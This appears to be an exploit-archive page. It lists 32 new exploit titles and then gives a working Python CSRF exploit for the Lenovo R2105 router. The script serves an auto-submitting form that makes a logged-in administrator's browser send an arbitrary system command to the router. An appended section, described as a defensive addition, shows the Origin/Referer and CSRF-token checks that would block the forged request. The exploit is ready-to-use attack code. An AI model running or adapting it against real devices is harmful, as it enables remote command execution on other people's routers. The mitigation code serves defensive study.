
32 changes to exploits/shellcodes

xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)
Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation
Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation
Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation
Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass
Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation
Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation
Hootoo HT-05 - Remote Code Execution (Metasploit)
Across DR-810 ROM-0 - Backup File Disclosure
i-doit CMDB 1.12 - Arbitrary File Download
i-doit CMDB 1.12 - SQL Injection
Horde Imp - 'imap_open' Remote Command Execution
Modern POS 1.3 - Arbitrary File Download
Modern POS 1.3 - SQL Injection
Twilio WEB To Fax Machine System Application 1.0 - SQL Injection
Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin)
Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection
Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection
Find a Place CMS Directory 1.5 - SQL Injection
Cleanto 5.0 - SQL Injection
Lenovo R2105 - Cross-Site Request Forgery (Command Execution)
HealthNode Hospital Management System 1.0 - SQL Injection
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
ThinkPHP 5.X - Remote Command Execution
Real Estate Custom Script 2.0 - SQL Injection
Job Portal Platform 1.0 - SQL Injection
Umbraco CMS 7.12.4 - Authenticated Remote Code Execution
Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection
Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection
AudioCode 400HD - Command Injection
47 lines
No EOL
1.3 KiB
Python
Executable file
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
# Date: 01/14/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Version: 1.0
# Tested on: Windows 10 x64
# Note: The administrator who opens the URL should be authenticated.

import socket

server_ip = "0.0.0.0"
server_port = 80
router_ip = "192.168.11.1"

command = "reboot"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)

print "Currently listening at " + server_ip + ":" + str(server_port)

client, (client_host, client_port) = sock.accept()

print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)

client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
<input name="command" value=""" + command + """ type="hidden">
<input name="SystemCommandSubmit" value="Apply" type="hidden">
</form>
<script>
document.getElementById("frmcmd").submit();
</script>
</body>
</html>
""")

client.close()
sock.close()
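
The forged POST above succeeds because `/goform/SystemCommand` accepts any request that carries the administrator's session, wherever it came from. The following is an added defensive example (Python 3, not part of the original file and not the vendor's firmware) of the server-side origin and token check that would refuse it; the `csrf_token` field name, the `attacker.example` host and both sample requests are constructed assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumption: the admin UI is served from this origin (router_ip in the file above).
TRUSTED_ORIGIN = "http://192.168.11.1"
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_of(url):
    """Reduce an Origin or Referer value to scheme://host[:port], or None."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()


def check_request(method, headers, form, session_token):
    """Return (allowed, reason) for a request that carries a valid admin session."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    # 1. Source check: trust Origin when present, else Referer; an opaque
    #    "null" origin or no header at all is rejected, not waved through.
    source = origin_of(headers.get("Origin") or headers.get("Referer"))
    if source is None:
        return False, "no usable Origin or Referer"
    if source != TRUSTED_ORIGIN:
        return False, "cross-origin source " + source
    # 2. Token check: per-session secret the attacker's page cannot read.
    sent = form.get("csrf_token", "")
    if not session_token or not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample data: a per-session token and the form fields from the file above.
TOKEN = secrets.token_urlsafe(32)
FIELDS = {"command": "reboot", "SystemCommandSubmit": "Apply"}
# Constructed: what a browser sends when the auto-submitting page fires its form.
FORGED = ("POST", {"Origin": "http://attacker.example",
                   "Referer": "http://attacker.example/"}, dict(FIELDS))
# Constructed: the same action submitted from the router's own admin page.
LEGIT = ("POST", {"Origin": TRUSTED_ORIGIN}, dict(FIELDS, csrf_token=TOKEN))
```

Either check alone stops the request this file generates; applying both covers clients that strip `Origin`/`Referer` and deployments where the token leaks.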